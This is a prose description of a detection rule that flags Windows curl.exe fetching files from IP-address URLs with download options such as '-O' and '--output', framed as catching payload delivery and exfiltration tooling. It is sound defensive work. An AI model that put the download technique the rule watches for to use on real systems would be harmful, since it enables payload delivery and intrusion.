This detection rule is designed to identify instances where the Windows command-line utility 'curl.exe' is used to download files directly from URLs that point to IP addresses. The rule looks for specific command line patterns that are indicative of such file downloads, using regex to capture IP address formats within the command line arguments. The detection leverages the process creation log source category, focusing on instances where 'curl.exe' is being invoked with certain options that suggest it is being used to download files, particularly options like '-O', '--remote-name', and '--output'. The rule will trigger if the command includes an IP address and various file extensions are being suppressed from the downloads to avoid common and potentially benign files. It aims to provide visibility into potentially malicious file downloads executed from allowed executables, which could be used by attackers to deliver payloads or data exfiltration tools. False positives may occur, particularly for benign uses of curl with direct IP access, thus users are advised to monitor the context of alerts closely.